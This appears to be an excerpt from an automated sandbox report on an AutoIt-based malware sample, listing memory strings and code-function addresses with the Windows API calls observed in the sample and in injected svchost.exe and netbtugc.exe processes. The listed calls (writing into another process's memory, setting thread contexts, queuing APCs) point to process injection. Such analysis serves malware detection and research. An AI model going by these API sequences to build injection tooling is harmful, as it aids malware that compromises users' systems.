Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7a7680af-b
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_74824180-c
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5780f7dd-f

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672B60 NtClose,LdrInitializeThunk,	2_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,	2_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03674340 NtSetContextThread,	2_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03674650 NtSuspendThread,	2_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BE0 NtQueryValueKey,	2_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BF0 NtAllocateVirtualMemory,	2_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BA0 NtEnumerateValueKey,	2_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672B80 NtQueryInformationFile,	2_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AF0 NtWriteFile,	2_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AD0 NtReadFile,	2_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AB0 NtWaitForSingleObject,	2_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F60 NtCreateProcessEx,	2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F30 NtCreateSection,	2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FE0 NtCreateFile,	2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FA0 NtQuerySection,	2_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FB0 NtResumeThread,	2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F90 NtProtectVirtualMemory,	2_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672E30 NtWriteVirtualMemory,	2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672EE0 NtQueueApcThread,	2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672EA0 NtAdjustPrivilegesToken,	2_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672E80 NtReadVirtualMemory,	2_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D30 NtUnmapViewOfSection,	2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D00 NtSetInformationFile,	2_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D10 NtMapViewOfSection,	2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DD0 NtDelayExecution,	2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DB0 NtEnumerateKey,	2_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C60 NtCreateKey,	2_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C00 NtQueryInformationProcess,	2_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CF0 NtOpenProcess,	2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CC0 NtQueryVirtualMemory,	2_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CA0 NtQueryInformationToken,	2_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673010 NtOpenDirectoryObject,	2_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673090 NtSetValueKey,	2_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036739B0 NtGetContextThread,	2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673D70 NtOpenThread,	2_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673D10 NtOpenProcessToken,	2_2_03673D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03634340 NtSetContextThread,LdrInitializeThunk,	4_2_03634340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03634650 NtSuspendThread,LdrInitializeThunk,	4_2_03634650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632B60 NtClose,LdrInitializeThunk,	4_2_03632B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_03632BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_03632BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_03632BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632AF0 NtWriteFile,LdrInitializeThunk,	4_2_03632AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632AD0 NtReadFile,LdrInitializeThunk,	4_2_03632AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632F30 NtCreateSection,LdrInitializeThunk,	4_2_03632F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632FE0 NtCreateFile,LdrInitializeThunk,	4_2_03632FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632FB0 NtResumeThread,LdrInitializeThunk,	4_2_03632FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_03632EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_03632E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_03632D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_03632D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_03632DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632DD0 NtDelayExecution,LdrInitializeThunk,	4_2_03632DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632C60 NtCreateKey,LdrInitializeThunk,	4_2_03632C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_03632C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_03632CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036335C0 NtCreateMutant,LdrInitializeThunk,	4_2_036335C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036339B0 NtGetContextThread,LdrInitializeThunk,	4_2_036339B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632B80 NtQueryInformationFile,	4_2_03632B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632AB0 NtWaitForSingleObject,	4_2_03632AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632F60 NtCreateProcessEx,	4_2_03632F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632FA0 NtQuerySection,	4_2_03632FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632F90 NtProtectVirtualMemory,	4_2_03632F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632E30 NtWriteVirtualMemory,	4_2_03632E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632EA0 NtAdjustPrivilegesToken,	4_2_03632EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632D00 NtSetInformationFile,	4_2_03632D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632DB0 NtEnumerateKey,	4_2_03632DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632C00 NtQueryInformationProcess,	4_2_03632C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632CF0 NtOpenProcess,	4_2_03632CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03632CC0 NtQueryVirtualMemory,	4_2_03632CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03633010 NtOpenDirectoryObject,	4_2_03633010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03633090 NtSetValueKey,	4_2_03633090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03633D70 NtOpenThread,	4_2_03633D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03633D10 NtOpenProcessToken,	4_2_03633D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C47920 NtCreateFile,	4_2_00C47920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C47A70 NtReadFile,	4_2_00C47A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C47BE0 NtClose,	4_2_00C47BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C47B50 NtDeleteFile,	4_2_00C47B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C47D30 NtAllocateVirtualMemory,	4_2_00C47D30

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009C40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_009C40B1

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009B8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009B8858

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009C545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_009C545F

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0096E800	0_2_0096E800
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098DBB5	0_2_0098DBB5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009E804A	0_2_009E804A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0096E060	0_2_0096E060
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00974140	0_2_00974140
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00982405	0_2_00982405
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00996522	0_2_00996522
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0099267E	0_2_0099267E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009E0665	0_2_009E0665
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098283A	0_2_0098283A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00976843	0_2_00976843
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009989DF	0_2_009989DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00996A94	0_2_00996A94
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009E0AE2	0_2_009E0AE2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00978A0E	0_2_00978A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C8B13	0_2_009C8B13
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009BEB07	0_2_009BEB07
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098CD61	0_2_0098CD61
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00997006	0_2_00997006
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00973190	0_2_00973190
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0097710E	0_2_0097710E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00961287	0_2_00961287
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009833C7	0_2_009833C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098F419	0_2_0098F419
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00975680	0_2_00975680
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009816C4	0_2_009816C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009878D3	0_2_009878D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009758C0	0_2_009758C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00981BB8	0_2_00981BB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00999D05	0_2_00999D05
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0096FE40	0_2_0096FE40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00981FD0	0_2_00981FD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098BFE6	0_2_0098BFE6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_03E93660	0_2_03E93660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA352	2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037003E6	2_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C02C0	2_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C8158	2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630100	2_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DA118	2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F81CC	2_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F41A2	2_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037001AA	2_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D2000	2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640770	2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664750	2_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363C7C0	2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365C6E0	2_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03700591	2_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F2446	2_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4420	2_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EE4F6	2_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FAB40	2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F6BD7	2_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370A9A6	2_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364A840	2_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03642840	2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E8F0	2_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036268B8	2_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B4F40	2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03682F28	2_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660F30	2_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E2F30	2_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364CFE0	2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632FC8	2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BEFA0	2_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640E59	2_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FEE26	2_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FEEDB	2_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652E90	2_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FCE93	2_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364AD00	2_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DCD1F	2_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363ADE0	2_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03658DBF	2_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640C00	2_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630CF2	2_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0CB5	2_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362D34C	2_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F132D	2_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0368739A	2_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E12ED	2_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365B2C0	2_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036452A0	2_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367516C	2_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362F172	2_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370B16B	2_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364B1B0	2_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F70E9	2_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF0E0	2_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EF0CC	2_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036470C0	2_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF7B0	2_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03685630	2_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F16CC	2_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7571	2_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037095C3	2_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DD5B0	2_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03631460	2_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FF43F	2_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFB76	2_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B5BF0	2_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367DBF9	2_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365FB80	2_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B3A6C	2_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFA49	2_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7A46	2_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EDAC6	2_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DDAAC	2_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03685AA0	2_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E1AA3	2_2_036E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03649950	2_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365B950	2_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D5910	2_2_036D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AD800	2_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036438E0	2_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFF09	2_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03603FD2	2_2_03603FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03603FD5	2_2_03603FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFFB1	2_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03641F92	2_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03649EB0	2_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F7D73	2_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03643D40	2_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F1D5A	2_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365FDC0	2_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B9C32	2_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FFCF2	2_2_036FFCF2
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E5B7BA	3_2_05E5B7BA
